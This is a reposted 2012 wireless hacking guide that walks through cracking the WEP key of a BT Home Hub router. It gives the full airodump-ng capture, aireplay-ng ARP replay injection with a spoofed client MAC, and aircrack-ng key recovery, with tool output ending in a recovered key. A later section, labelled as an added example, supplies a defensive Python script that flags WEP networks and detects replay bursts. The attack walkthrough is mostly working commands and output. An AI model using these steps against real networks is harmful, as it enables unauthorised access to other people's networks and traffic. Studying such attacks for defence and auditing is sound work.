Hacking a Home Hub
Penetration testing of wireless networks.
Published by: agtpkustoms13 on Oct 03, 2012
Copyright: Attribution Non-commercial

DISCLAIMER: 1) This guide should not be used illegally. 2) There is no warranty or responsibility associated with this guide or with the author. 3) You accept sole responsibility for your actions.

“This is my first full hacking guide, so I hope you like it and it works for you in your test lab! If you find a better way to achieve the goals in this guide then please let me know via the forum.”
What is our goal?
“Should we just collect the AP key to prove we can? Or should we go all the way!”

In order to gain access to the network we need to get the access key, and to do this we are going to use a number of tools. The quickest way to get them all is to download the BackTrack live CD.

LIVECD: Backtrack.iso
Version: latest (final) 3 at time of writing.

Once you have downloaded the ISO, burn it to CD, reboot from the CD and, when you are in and at a desktop ;), continue with this guide. Are you ready? Log in, fire up X, open a console or three and let's get started.
HACKING A HOMEHUB
Invaders in our Homes

In order to find our target network's details, first we need to run "airodump-ng" with its default channel hopping:
airodump-ng -w CAPTURE wlan0
This command creates two files, CAPTURE.cap and CAPTURE.txt. CAPTURE.txt contains readable output such as the ESSID and any other MACs, while CAPTURE.cap contains the packets collected while airodump-ng is sniffing traffic. Once the access point's information has been collected, airodump-ng can be reconfigured to collect only the packets on the network we need:
airodump-ng -w /tmp/myhomehub --channel 6 --bssid 00:18:F6:0B:00:5D wlan0
CH 6 ][ Elapsed: 52 mins ][ 2008-06-27 02:15

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
00:18:F6:0B:00:5D  217 100    30617    32163   31   6  48  WEP  WEP    OPN  BTHomeHub-9AC1

BSSID              STATION            PWR   Lost  Packets  Probes
00:18:F6:0B:00:5D  00:00:00:00:00:C1  219     72    29877

Now we have airodump-ng collecting packets on channel 6 while filtering out any other AP that may be on the same channel, using the --bssid option. This keeps the file size lower and helps my poor little D500 and DWL650 keep up.

OK, so we are all set capturing the packets sent over this network, but they are all encrypted with a KEY, so we need that KEY if we are to go any further than just sniffing. This is achieved by sniffing for a weak packet and generating a larger number of weak packets for the cracking process. There are a number of ways to achieve this, but the one we are going to use is a very simple and effective method for testing against a default BTHomeHub with at least one wireless client ;)
aireplay-ng -3 -b 00:18:F6:0B:00:5D -h 00:00:00:00:00:C1 wlan0
The interface MAC (01:01:01:01:01:01) doesn't match the specified MAC (-h).
        ifconfig wlan0 hw ether 00:00:00:00:00:C1
Saving ARP requests in replay_arp-0712-012732.cap
You should also start airodump-ng to capture replies.
Read 167179 packets (got 45379 ARP requests), sent 544876 packets...(148 pps)

What should now begin to happen is that the #Data count for your target network starts to increase quicker and quicker, until you are pushing around 100+ packets per second at the AP. This in turn causes the AP to generate the weak packets that can be collected and cracked using aircrack-ng:
aircrack-ng -n 64 -z /tmp/myhomehub-01.cap
Aircrack-ng 0.9.1

[00:01:08] Tested 80/140000 keys (got 30153 IVs)

KB   depth   byte(vote)
 0   0/  1   16( 173) 3D( 155) 94( 147) 25( 146) 03( 143) 66( 143) 55( 142) 5C( 141) 09( 138) 56( 138) F8( 138) EC( 137) 4B( 136)
 1   6/  8   88( 145) 82( 144) F4( 144) 44( 143) 0E( 142) D8( 142) 81( 139) 07( 138) 1D( 136) 73( 136) 80( 136) 87( 136) F6( 136)
 2   0/  1   D5( 165) 59( 147) 6A( 144) 98( 144) 32( 142) 89( 142) 5D( 141) 74( 140) 1B( 139) 69( 139) 80( 139) 9E( 138) 66( 137)
 3   0/  1   94( 179) 4F( 146) 10( 143) E0( 143) 0A( 142) C7( 139) F1( 139) 1E( 138) 4A( 138) 54( 137) 5F( 137) AB( 137) 02( 136)
 4   0/ 10   71( 145) 8D( 143) D1( 141) 39( 140) 76( 140) C0( 140) CA( 139) 72( 138) 7C( 138) 15( 137) 03( 136) 42( 136) 47( 136)
 5   0/  1   74( 153) 37( 146) 5F( 141) 6F( 141) CE( 138) DD( 137) 90( 136) CD( 136) D3( 136) 24( 135) 45( 134) 94( 134) C6( 134)

KEY FOUND! [ 10:6A:5F:51:A1 ]

To crack the key you are going to need a large number of weak packets; while creating this guide the sniffing process took over 50 minutes and captured over 30000 weak packets. Once the process is complete you can stop airodump-ng and aireplay-ng, as we now have the key to authenticate to the network.
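The two things a defender can read straight off the airodump-ng screen shown above are the weakness (ENC = WEP, the cipher this whole guide relies on) and the symptom of the ARP-replay step (the #Data counter climbing by 100+ frames per second for one BSSID). The following script is an added example, not part of the original guide and not an aircrack-ng tool: it parses airodump-ng screen dumps laid out like the one in the guide, flags WEP and open networks for migration, and compares two snapshots to alert on a data-frame burst that looks like replay injection. The second snapshot, the 100 pps threshold and the assumption that the column layout matches the guide's screen are all constructed for the example.

```python
"""Audit helper for airodump-ng screen dumps (added example, not from the guide):
flags WEP/open APs and detects data-frame bursts consistent with ARP replay."""
import re

# Constructed sample: the screen from the guide, restored to its column layout
# (PWR/RXQ values copied as printed there).
SNAPSHOT_T0 = """\
 CH  6 ][ Elapsed: 52 mins ][ 2008-06-27 02:15

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:18:F6:0B:00:5D  217 100    30617    32163   31   6  48  WEP  WEP    OPN  BTHomeHub-9AC1

 BSSID              STATION            PWR   Lost  Packets  Probes
 00:18:F6:0B:00:5D  00:00:00:00:00:C1  219     72    29877
"""

# Constructed second snapshot one minute later: #Data jumped by 9000 frames
# (150 frames/s), the kind of burst the replay step produces.
SNAPSHOT_T1 = """\
 CH  6 ][ Elapsed: 53 mins ][ 2008-06-27 02:16

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
 00:18:F6:0B:00:5D  217 100    30731    41163  150   6  48  WEP  WEP    OPN  BTHomeHub-9AC1

 BSSID              STATION            PWR   Lost  Packets  Probes
 00:18:F6:0B:00:5D  00:00:00:00:00:C1  219     72    38877
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
# AP row: BSSID PWR RXQ Beacons #Data #/s CH MB ENC CIPHER AUTH ESSID (ESSID may contain spaces)
AP_ROW = re.compile(
    rf"^\s*({MAC})\s+(\S+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(\S+)\s+"
    rf"(\S+)\s+(\S+)\s+(\S+)\s*(.*)$")
# Station row: BSSID STATION PWR Lost Packets Probes ("(not associated)" rows are skipped)
STA_ROW = re.compile(rf"^\s*({MAC})\s+({MAC})\s+(\S+)\s+(\d+)\s+(\d+)\s*(.*)$")


def parse_elapsed(text):
    """Return the 'Elapsed:' header value in seconds ('40 s', '52 mins', '1 hour 2 mins')."""
    m = re.search(r"Elapsed:\s*([^\]]+?)\s*\]", text)
    if not m:
        raise ValueError("no Elapsed header in snapshot")
    factor = {"s": 1, "min": 60, "hour": 3600}
    return sum(int(n) * factor[u] for n, u in re.findall(r"(\d+)\s*(hour|min|s)", m.group(1)))


def parse_airodump(text):
    """Split a screen dump into {'elapsed': seconds, 'aps': [...], 'stations': [...]}."""
    aps, stations, in_station_table = [], [], False
    for line in text.splitlines():
        if "STATION" in line:          # header of the second table
            in_station_table = True
            continue
        m = (STA_ROW if in_station_table else AP_ROW).match(line)
        if not m:
            continue
        if in_station_table:
            stations.append({"bssid": m.group(1).upper(), "station": m.group(2).upper(),
                             "packets": int(m.group(5))})
        else:
            aps.append({"bssid": m.group(1).upper(), "beacons": int(m.group(4)),
                        "data": int(m.group(5)), "per_sec": int(m.group(6)),
                        "channel": int(m.group(7)), "enc": m.group(9),
                        "cipher": m.group(10), "auth": m.group(11),
                        "essid": m.group(12).strip()})
    return {"elapsed": parse_elapsed(text), "aps": aps, "stations": stations}


def audit_encryption(snapshot):
    """Flag APs whose advertised encryption gives no real protection."""
    findings = []
    for ap in snapshot["aps"]:
        if ap["enc"] == "WEP":
            findings.append((ap["bssid"], ap["essid"], "WEP is broken; migrate to WPA2/WPA3"))
        elif ap["enc"] == "OPN":
            findings.append((ap["bssid"], ap["essid"], "open network; no encryption at all"))
    return findings


def detect_replay_burst(before, after, threshold_pps=100):
    """Report BSSIDs whose #Data counter grew faster than threshold_pps between two
    snapshots; a sustained 100+ frames/s on a home AP is the replay signature."""
    dt = after["elapsed"] - before["elapsed"]
    if dt <= 0:
        raise ValueError("snapshots must be in chronological order")
    earlier = {ap["bssid"]: ap["data"] for ap in before["aps"]}
    alerts = []
    for ap in after["aps"]:
        if ap["bssid"] in earlier:
            rate = (ap["data"] - earlier[ap["bssid"]]) / dt
            if rate >= threshold_pps:
                alerts.append((ap["bssid"], ap["essid"], round(rate, 1)))
    return alerts


if __name__ == "__main__":
    t0, t1 = parse_airodump(SNAPSHOT_T0), parse_airodump(SNAPSHOT_T1)
    for bssid, essid, why in audit_encryption(t0):
        print(f"WEAK   {bssid} {essid}: {why}")
    for bssid, essid, rate in detect_replay_burst(t0, t1):
        print(f"BURST  {bssid} {essid}: {rate} data frames/s")
```

Run against periodic dumps of a live airodump-ng session, the burst check separates a replay flood from normal traffic by rate rather than by content, so it does not need to decrypt anything; the encryption audit is the durable fix, since no amount of monitoring makes a WEP key safe.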